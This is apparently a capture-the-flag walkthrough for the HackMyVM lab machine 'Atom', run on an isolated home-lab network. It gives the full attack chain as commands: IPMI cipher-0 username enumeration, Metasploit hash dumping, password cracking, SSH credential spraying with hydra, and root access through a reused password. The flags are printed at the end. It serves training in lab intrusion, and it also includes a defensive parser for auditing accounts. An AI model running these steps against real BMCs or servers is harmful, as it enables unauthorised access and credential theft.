HackMyVM | Atom

In this walkthrough, I demonstrate how I obtained complete ownership of Atom from HackMyVM
In: HackMyVM, Attack, CTF, Home Lab, Linux, Easy Challenge

Nmap Results

ℹ️
I keep all of my distrusted hosts from platforms like HackMyVM on a segmented VLAN -- 10.9.9.0/24 -- that has no internet access

TCP Scan

# Nmap 7.94SVN scan initiated Fri Aug 16 14:34:24 2024 as: nmap -Pn -p- --min-rate 2000 -sC -sV -oN nmap-scan.txt 10.9.9.11
Nmap scan report for 10.9.9.11
Host is up (0.00047s latency).
Not shown: 65534 closed tcp ports (reset)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 9.2p1 Debian 2+deb12u2 (protocol 2.0)
| ssh-hostkey: 
|   256 e7:ce:f2:f6:5d:a7:47:5a:16:2f:90:07:07:33:4e:a9 (ECDSA)
|_  256 09:db:b7:e8:ee:d4:52:b8:49:c3:cc:29:a5:6e:07:35 (ED25519)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Fri Aug 16 14:34:26 2024 -- 1 IP address (1 host up) scanned in 1.81 seconds
ℹ️
Since only tcp/22 is open, I'm going to try a UDP scan as well. SSH is almost never the first way into a box.

UDP Scan

# Nmap 7.94SVN scan initiated Fri Aug 16 14:34:32 2024 as: nmap -Pn --top-ports 300 -sU -T4 -oN udp-nmap-scan.txt 10.9.9.11
Warning: 10.9.9.11 giving up on port because retransmission cap hit (6).
Nmap scan report for 10.9.9.11
Host is up (0.00080s latency).
Not shown: 283 closed udp ports (port-unreach)
PORT      STATE         SERVICE
623/udp   open          asf-rmcp

# Nmap done at Fri Aug 16 14:39:31 2024 -- 1 IP address (1 host up) scanned in 299.34 seconds

Service Enumeration

UDP/623

623/UDP/TCP - IPMI | HackTricks
IPMI Vulnerabilities

In the realm of IPMI 2.0, a significant security flaw was uncovered by Dan Farmer, exposing a vulnerability through cipher type 0. This vulnerability, documented in detail at Dan Farmer's research, enables unauthorized access with any password provided a valid user is targeted. This weakness was found across various BMCs from manufacturers like HP, Dell, and Supermicro, suggesting a widespread issue within all IPMI 2.0 implementations.

Testing IPMI

We have IPMI version 2.0 😈
Cipher 0 is valid
💡
Again, we can authenticate to the IPMI server with any password given that a username is valid
for name in $(cat /usr/share/seclists/Usernames/top-usernames-shortlist.txt); do
  ipmitool -I lanplus -C 0 -H 10.9.9.11 -U "$name" -P thisisnotthepassword user list > /dev/null 2>&1 \
    && echo "Valid username found: ${name}"
done

Quick bash script to test for valid usernames, starting with a small list. The && means the echo only runs if the ipmitool command exits successfully (status 0), which with cipher 0 happens whenever the username exists, regardless of the password supplied.

Valid username found: admin



Pulling Info from IPMI

ipmitool -I lanplus -C 0 -H 10.9.9.11 -U admin -P thisisnotthepassword user list 

Usernames from IPMI

ID  Name             Callin  Link Auth  IPMI Msg   Channel Priv Limit
1                    true    false      false      Unknown (0x00)
2   admin            true    false      true       ADMINISTRATOR
3   analiese         true    false      true       USER
4   briella          true    false      true       USER
5   richardson       true    false      true       USER
6   carsten          true    false      true       USER
7   sibylle          true    false      true       USER
8   wai-ching        true    false      true       USER
9   jerrilee         true    false      true       USER
10  glynn            true    false      true       USER
11  asia             true    false      true       USER
12  zaylen           true    false      true       USER
13  fabien           true    false      true       USER
14  merola           true    false      true       USER
15  jem              true    false      true       USER
16  riyaz            true    false      true       USER
17  laten            true    false      true       USER
18  cati             true    false      true       USER
19  rozalia          true    false      true       USER
20  palmer           true    false      true       USER
21  onida            true    false      true       USER
22  terra            true    false      true       USER
23  ranga            true    false      true       USER
24  harrie           true    false      true       USER
25  pauly            true    false      true       USER
26  els              true    false      true       USER
27  bqb              true    false      true       USER
28  karlotte         true    false      true       USER
29  zali             true    false      true       USER
30  ende             true    false      true       USER
31  stacey           true    false      true       USER
32  shirin           true    false      true       USER
33  kaki             true    false      true       USER
34  saman            true    false      true       USER
35  kalie            true    false      true       USER
36  deshawn          true    false      true       USER
37  mayeul           true    false      true       USER
38                   true    false      false      Unknown (0x00)
39                   true    false      false      Unknown (0x00)
40                   true    false      false      Unknown (0x00)
41                   true    false      false      Unknown (0x00)
42                   true    false      false      Unknown (0x00)
43                   true    false      false      Unknown (0x00)
44                   true    false      false      Unknown (0x00)
45                   true    false      false      Unknown (0x00)
46                   true    false      false      Unknown (0x00)
47                   true    false      false      Unknown (0x00)
48                   true    false      false      Unknown (0x00)
49                   true    false      false      Unknown (0x00)
50                   true    false      false      Unknown (0x00)
51                   true    false      false      Unknown (0x00)
52                   true    false      false      Unknown (0x00)
53                   true    false      false      Unknown (0x00)
54                   true    false      false      Unknown (0x00)
55                   true    false      false      Unknown (0x00)
56                   true    false      false      Unknown (0x00)
57                   true    false      false      Unknown (0x00)
58                   true    false      false      Unknown (0x00)
59                   true    false      false      Unknown (0x00)
60                   true    false      false      Unknown (0x00)
61                   true    false      false      Unknown (0x00)
62                   true    false      false      Unknown (0x00)
63                   true    false      false      Unknown (0x00)
ipmitool -I lanplus -C 0 -H 10.9.9.11 -U admin -P thisisnotthepassword user list | grep '^[0-9]' | cut -c5-21 | tr -d ' ' | grep -v '^$' > usernames.txt

Generate a list of users and save in usernames.txt. The Name column in the ipmitool output is fixed-width (characters 5 to 21), so cut by character position rather than by space-delimited field; `cut -d ' ' -f 3` does not collapse the run of spaces after a single-digit ID and silently drops those names (admin included).
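To make the account-table parsing robust, and to see at a glance which BMC accounts hold ADMINISTRATOR privilege, here is an added Python parser for the `ipmitool user list` format shown above. It is not part of the original walkthrough; the table embedded in it is a constructed excerpt in the same column layout.

```python
"""Parse `ipmitool ... user list` output into records and audit the BMC account table.

Added example, not from the original post. SAMPLE is a constructed excerpt
that mirrors the fixed-width layout of the real command output.
"""
import re
from dataclasses import dataclass

SAMPLE = """\
ID  Name             Callin  Link Auth  IPMI Msg   Channel Priv Limit
1                    true    false      false      Unknown (0x00)
2   admin            true    false      true       ADMINISTRATOR
3   analiese         true    false      true       USER
21  onida            true    false      true       USER
38                   true    false      false      Unknown (0x00)
"""

@dataclass
class IpmiUser:
    uid: int
    name: str          # empty string for an unnamed (unused) slot
    callin: bool
    link_auth: bool
    ipmi_msg: bool
    priv: str

_ROW = re.compile(r"^\d+\s")   # data rows start with the numeric ID; the header starts with "ID"

def parse_user_list(text: str) -> list[IpmiUser]:
    """Parse by column position: ID occupies columns 0-3, Name 4-20, the rest is whitespace-separated."""
    users = []
    for line in text.splitlines():
        if not _ROW.match(line):
            continue
        uid = int(line[:4])
        name = line[4:21].strip()
        callin, link, msg, priv = line[21:].split(None, 3)   # priv may contain a space, e.g. "Unknown (0x00)"
        users.append(IpmiUser(uid, name, callin == "true", link == "true", msg == "true", priv.strip()))
    return users

def named_users(users: list[IpmiUser]) -> list[str]:
    """The populated account names, the equivalent of the shell pipeline that builds usernames.txt."""
    return [u.name for u in users if u.name]

def admin_accounts(users: list[IpmiUser]) -> list[str]:
    """Accounts that can send IPMI messages with ADMINISTRATOR privilege: the ones to review first on a real BMC."""
    return [u.name for u in users if u.ipmi_msg and u.priv == "ADMINISTRATOR"]
```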



Pulling Hashes from IPMI

sudo msfconsole
use auxiliary/scanner/ipmi/ipmi_dumphashes
set RHOSTS 10.9.9.11
set USERS_FILE usernames.txt
set OUTPUT_JOHN_FILE /home/ben/Pentest/Training/HackMyVM/Atom/hash
run
john --wordlist=rockyou.txt hash
john --show hash | grep ':' | cut -d ' ' -f 2 > creds.txt

Create a credential file for use with SSH testing



TCP/22

hydra -I -v -C creds.txt ssh://10.9.9.11

Exploit

IPMI Protocol and Weak Passwords

The IPMI service on the target runs IPMI 2.0 with cipher suite 0 enabled, which lets a client authenticate as any valid user without supplying the correct password. With that, we can confirm which usernames exist, dump the password hashes for those users, and crack any whose password appears in a wordlist.

ssh onida@10.9.9.11

Post-Exploit Enumeration

Operating Environment

OS & Kernel

PRETTY_NAME="Debian GNU/Linux 12 (bookworm)"
NAME="Debian GNU/Linux"
VERSION_ID="12"
VERSION="12 (bookworm)"
VERSION_CODENAME=bookworm
ID=debian
HOME_URL="https://www.debian.org/"
SUPPORT_URL="https://www.debian.org/support"
BUG_REPORT_URL="https://bugs.debian.org/"
    
Linux atom 6.1.0-21-amd64 #1 SMP PREEMPT_DYNAMIC Debian 6.1.90-1 (2024-05-03) x86_64 GNU/Linux

Current User

uid=1000(onida) gid=1000(onida) groups=1000(onida),100(users)
    
sudo command not found



Users and Groups

Local Users

onida:x:1000:1000:,,,:/home/onida:/bin/bash

Local Groups

users:x:100:onida
onida:x:1000:  



Network Configurations

Network Interfaces

2: ens18: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc fq_codel state UP group default qlen 1000
    link/ether bc:24:11:6e:ab:9b brd ff:ff:ff:ff:ff:ff
    altname enp0s18
    inet 10.9.9.11/24 brd 10.9.9.255 scope global dynamic noprefixroute ens18
       valid_lft 6279sec preferred_lft 6279sec
    inet6 fe80::889f:b1c2:3dfc:3d93/64 scope link noprefixroute 
       valid_lft forever preferred_lft forever
3: docker0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc noqueue state UP group default 
    link/ether 02:42:48:1f:93:dd brd ff:ff:ff:ff:ff:ff
    inet 172.17.0.1/16 brd 172.17.255.255 scope global docker0
       valid_lft forever preferred_lft forever
    inet6 fe80::42:48ff:fe1f:93dd/64 scope link 
       valid_lft forever preferred_lft forever   

Open Ports

tcp   LISTEN 0      4096         127.0.0.1:43749      0.0.0.0:*           
tcp   LISTEN 0      511          127.0.0.1:80         0.0.0.0:*   



Interesting Files

/var/www/html/atom-2400-database.db

sqlite3 /var/www/html/atom-2400-database.db
sqlite3> .tables
select * from users;
1|atom|$2y$10$Z1K.4yVakZEY.Qsju3WZzukW/M3fI6BkSohYOiBQqG7pK1F2fH9Cm

Privilege Escalation

Cracking the User Hash



Becoming Root

💡
There is no atom user on the box when checking /etc/passwd, so let's see if this password is also re-used for root
su root
The password is, indeed, re-used for root



Flags

User

f75390001fa2fe806b4e3f1e5dadeb2b   

Root

d3a4fd660f1af5a7e3c2f17314f4a962   